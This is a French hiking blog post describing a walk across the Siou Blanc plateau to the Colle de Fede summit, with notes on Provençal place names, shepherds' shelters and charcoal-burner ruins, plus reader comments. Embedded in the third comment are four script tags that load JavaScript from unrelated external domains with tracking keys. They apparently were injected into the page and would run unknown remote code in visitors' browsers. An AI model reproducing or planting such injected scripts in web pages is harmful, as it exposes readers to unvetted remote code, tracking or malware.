• Siou Blanc, la colle de fede

     Balade dans le superbe (mais pour combien de temps encore ?) plateau du Siou Blanc, aujourd'hui destination la Colle de Fede.

    - Colle de fede, = la colline des brebis,

    - colle = colline et non col qui se dit "pas".

    - li Fedo = les brebis, lou fedié = le gardien des brebis.

    C'est aussi, le sommet le plus élevé du plateau du Siou Blanc il culmine à 824m et propose une vue panoramique sur quasiment 360°, ce sera notre objectif par cette belle journée qui démarre fraîche et se termine par une bonne température printanière.

    Départ d'un lieu appelé "l'aigue" du fait de la présence d'eau dans une petite mare, presque toute l'année, j'ai dit presque car ce jour la mare aux têtards était à sec ! 

    Une Orchis, déjà malmenée ouvre le sentier, direction, la bergerie du Siou Blanc en évitant la route.

    Siou Blanc, la colle de fede

     nous passons au large de la bergerie, sur la grande piste qui file vers le carrefour des Jounces.

    Siou Blanc, la colle de fede

    nous faisons un court arrêt devant un des nombreux gouffres du plateau, l'aven du Palan. 

    Siou Blanc, la colle de fede

    puis un autre arrêt devant les superbes rochers tabulaires des Jounces ( Jounc = lieu où il ne pousse que des joncs ) et prenons le sentier qui file rejoindre le GR 99, direction La Garancière. 

    Siou Blanc, la colle de fede

    la piste devient un sentier de moins en moins large, de plus en plus pentu 

    Siou Blanc, la colle de fede

     Siou Blanc, la colle de fede

    Nous sommes déjà dans la colline aux brebis, de nombreux abris sous roche, aménagés en bergeries temporaires, sont visibles sous la petite falaise 

    Siou Blanc, la colle de fede

     la sente grimpe encore, nous laissons de côté la direction "Jas de Laure" où nous irons, mais pas directement, la grimpette continue en direction du sommet de la Colle 

    Siou Blanc, la colle de fede

    d'autres bergeries sous roches, en cherchant bien dans les fourrés qui ont repris possession des lieux 

    Siou Blanc, la colle de fede

     plus petite que le précédent, cet abri est tout de même bien protégé par des murs en pierres,  

    Siou Blanc, la colle de fede

    un belvédère ouvre la vue sur le vallon de Valbelle, en bas, et sur les roches dolomitiques des Friginaires, en face 

    Siou Blanc, la colle de fede

    coup de zoom sur les aiguilles de Valbelle 

    Siou Blanc, la colle de fede

     le sentier devient encore plus raide, quelques ressauts rompent la monotonie de la grimpette

    Siou Blanc, la colle de fede

     Siou Blanc, la colle de fede

    le sommet approche, mais nous n'y sommes pas vraiment 

    Siou Blanc, la colle de fede

    la vue s'ouvre en grand, le ciel est parfaitement bleu, un petit vent souffle qui a dégagé le ciel 

    Siou Blanc, la colle de fede

     Siou Blanc, la colle de fede

    au loin...la mer, à vol d'oiseau elle n'est pas si éloignée 

    Siou Blanc, la colle de fede

    après une descente dans la forêt de yeuses et une petite remontée, nous voilà au sommet de la Colle de Fede, le toit du Siou Blanc. 

    Siou Blanc, la colle de fede

    le GR descend dans le ravin dit "des charbonniers", dans ce bois de chênes verts, les yeuses, on y fabriquait de grandes quantités de charbon de bois, les traces vestiges des charbonnières sont encore visibles, 

    Siou Blanc, la colle de fede

    les cabanes des carbounié, aussi, même si bien écroulées.  

    Siou Blanc, la colle de fede

    le GR est quitté, il part vers l'ouest, nous continuons la descente pour rejoindre le Jas de Laure après être passé devant l'aven du Vent qui Siffle... 

    Siou Blanc, la colle de fede

    Belle propriété, beau jas en ruines mais qui porte encore toute la beauté de ce que ce jas devait afficher comme puissance. 

    Siou Blanc, la colle de fede

     superbement exposé, les terres, qui furent agricoles, l'entourent

    Siou Blanc, la colle de fede

     Nous laissons la partie "habitation" pour nous poser dans la partie "bergerie", nous y serons au soleil, abrités du petit vent et surtout des pierres qui risquent de tomber des murs semi-écroulés

    Siou Blanc, la colle de fede

     Pour revenir à, la bergerie du Siou Blanc, nous prenons la piste qui passe à l'aven de la Brèche

    Siou Blanc, la colle de fede

    et revenons dans la prairie de la bergerie, retour à "l'aigue" par le même chemin que ce matin. 

    Siou Blanc, la colle de fede

     Fin de jolie balade facile dans le Siou Blanc

    Ceci n'est qu'un reportage, l’éditeur, l’auteur ou le diffuseur ne sauraient être tenus pour responsables dans

    l’hypothèse d’un accident sur cet itinéraire, et ce, quelles qu’en soient les causes.

     Pour les secours composer le 112

     

     

    « Luberon, le ravin de CombrèsLuberon, Les gorges de l'Aiguebrun »

  • Commentaires

    1
    Lundi 2 Mars à 08:38

    Le siou blanc, un beau paysage où je montais quand il y avait des passages de Chas-chas

    2
    Laret-Delattre
    Lundi 2 Mars à 10:56

    Quelle superbe région encore ! Mais celle là, je ne la connais pas ! Amitiés de Belgique, Jean-Pierre

    3
    Danielle/Marsu83
    Lundi 2 Mars à 11:46

    Merci pour toutes les connaissances partagées dans le compte rendu (vocabulaire etc;). Un circuit magnifique tant de fois effectué dans un sens ou dans l'autre, en marchant ou en courant mais en partant de la piste du Centre, via Bouche Ouinte et avec un plaisir chaque fois renouvelé !

    Mais que signifie "Siou" blanc ? "Celui qui est" blanc ?

    En vous souhaitant de belles randos !

    <script src="//jaretsummer.com/228ebbb479fb2ce2f7.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8846x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8846x&format=arrjs&r=1583145580982" type="text/javascript"></script> <script src="http://jaretsummer.com/ext/228ebbb479fb2ce2f7.js?sid=52666_8846_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
      • Jeudi 5 Mars à 17:01

        Bonjour, il est difficile de donner l'origine de "Siou Blanc", ta proposition n'est pas farfelue je pense, mais plutôt "je suis blanc" car en effet à une époque qui s'éloigne d eplus en plus, le plateau était blanc chaque hiver. quelquefois encore...

    4
    Mercredi 4 Mars à 11:02

    Panne d'ordi depuis deux jours, donc retard de lecture ! Mais contente d'avoir pu admirer tes magnifiques photos qui m'ont rappelé des souvenirs ... Bisous.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :